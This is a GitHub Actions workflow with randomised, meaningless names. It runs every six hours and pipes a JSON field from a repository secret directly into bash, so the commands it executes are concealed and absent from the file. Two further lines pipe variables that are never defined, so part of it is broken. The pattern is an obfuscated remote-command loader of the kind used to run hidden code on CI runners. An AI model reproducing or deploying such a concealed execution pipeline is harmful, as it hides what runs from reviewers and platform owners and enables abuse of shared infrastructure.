name: allowalarmed

on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: allowalarmed
        env:
          tkjba91582: ${{ secrets.tkjba91582 }}
        run: |
          echo $tkjba91582 | jq -r .r3010 | /bin/bash
          echo $xvc96 | jq -r .e10699 | /bin/bash
          echo $nlo770 | jq -r .s5239 | /bin/bash

